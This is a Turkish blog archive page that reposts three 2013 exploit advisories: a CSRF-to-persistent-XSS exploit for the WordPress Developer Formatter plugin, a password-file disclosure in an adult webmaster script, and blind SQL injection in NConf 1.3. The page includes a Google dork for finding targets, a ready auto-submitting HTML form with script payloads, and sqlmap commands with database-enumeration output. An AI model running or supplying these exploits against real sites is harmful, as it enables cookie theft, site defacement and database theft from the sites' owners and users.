Archive for 22 Ocak 2013

WordPress Developer Formatter CSRF Vulnerability

WordPress Developer Formatter CSRF ve XSS açıkları bulunmuştur.
Açığın oluşum yeri ve Açığın kullanımı hakkında açıklamalar şu şekilde;

# Exploit Title: WordPress Developer Formatter CSRF Vulnerability
# Google Dork: inurl:devformatter/devformatter.php
# Date: 21/01/13
# Author: Junaid Hussain -[ illSecure Research Group ] -
# Contact: | Website:
# Software Link:
# Vendor:
# Tested on: CentOS 5  
# Version: WordPress Version 3.5, Should work on all versions.

[#] Vulnerable Code
Page: devinterface.php - Line: 46  
 <form method="post" action="options-general.php?page=devformatter/devformatter.php">
[#] no nonce given - Read:
// CSRF Exploit:
<body onload="javascript:document.forms[0].submit()">
<form method="post" action="http://[DOMAIN NAME]/wp-admin/options-general.php?page=devformatter/devformatter.php">
<input name="usedevformat" style="display:none;" type="checkbox" checked/> 
<input name="copyclipboartext" type="text" style="display:none;" value="&lt;/textarea&gt;<script>alert(/xss/)</script>"  />
<input name="showtools" style="display:none;" type="checkbox" checked/> 
<textarea name="devfmtcss" rows="6" cols="60" style="display:none;"> 
	  body {
  background-image: url('javascript:alert("XSS");') !important;
[#] copyclipboartext & devfmtcss are both vulnerable to persistent xss which could lead to cookie stealing,
    malware distribution or even a defacememnt.
[#] Disclaimer: This exploit is for Research/Educational/Academic purposes only, 
                The Author of this exploit takes no responsibility for the way
                you use this exploit, you are responsible for your own actions.	

Adult Webmaster Script Password Disclosure Vulnerability

Adult Webmaster Script Password Disclosure şifre açığı bulunmuş olup açığa ilişkin exploit aşağıda yer almaktadır.

# Exploit Title: Adult Webmaster Script Admin  Password Disclosure
# Category:webapps
# Description software : software website for webmasters promoting adult companies through referrals
# Date: 21-1-2013
# Exploit Author: Dshellnoi Unix 
# Vendor Homepage:
# Software Link:

#-----------------------------VULNERABIlITY DESCRIPTION------------------------------------#
The failure comes from saving passwords in a text file with php fwrite function,
 that can be read by the url

#Thanks to : Luisfer ,Ivan sanchez, Juan carlos garcia

NConf 1.3 (detail.php detail_admin_items.php, id parameter) SQL Injection

NConf 1.3 (detail.php detail_admin_items.php, id parameter) SQL Injection açığı bulunmuş olup açığın oluşum yeri ve açık hakkında exploit ve kullanımı şu şekilde

# Exploit Title:  nconf  detail.php,detail_admin_items.php  blind injection
# Date: 2013/1/20
# Exploit Author: haidao,
# Software Link:
# Version:    nconf 1.3
# Tested on: Server: Apache/2.2.15 (Centos)  PHP/5.3.3

i find two files we can inject : 

both the inject point is 'id',, u can inject it  by sqlmap,,of course u mast have a account to login.

inject  like this:
python -u ""  -p id  --cookie="XXX"  --dbs

[*] starting at 23:45:22

[23:45:22] [INFO] resuming back-end DBMS 'mysql' 
[23:45:22] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1 AND 6429=6429

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=1 AND SLEEP(5)
[23:45:22] [INFO] the back-end DBMS is MySQL
web server operating system: Linux CentOS 6.3
web application technology: PHP 5.3.3, Apache 2.2.15
back-end DBMS: MySQL 5.0.11
[23:45:22] [INFO] fetching database names
[23:45:22] [INFO] fetching number of databases
[23:45:22] [INFO] resumed: 3
[23:45:22] [INFO] resumed: information_schema
[23:45:22] [INFO] resumed: nconf
[23:45:22] [INFO] resumed: test
available databases [3]:
[*] information_schema
[*] nconf
[*] test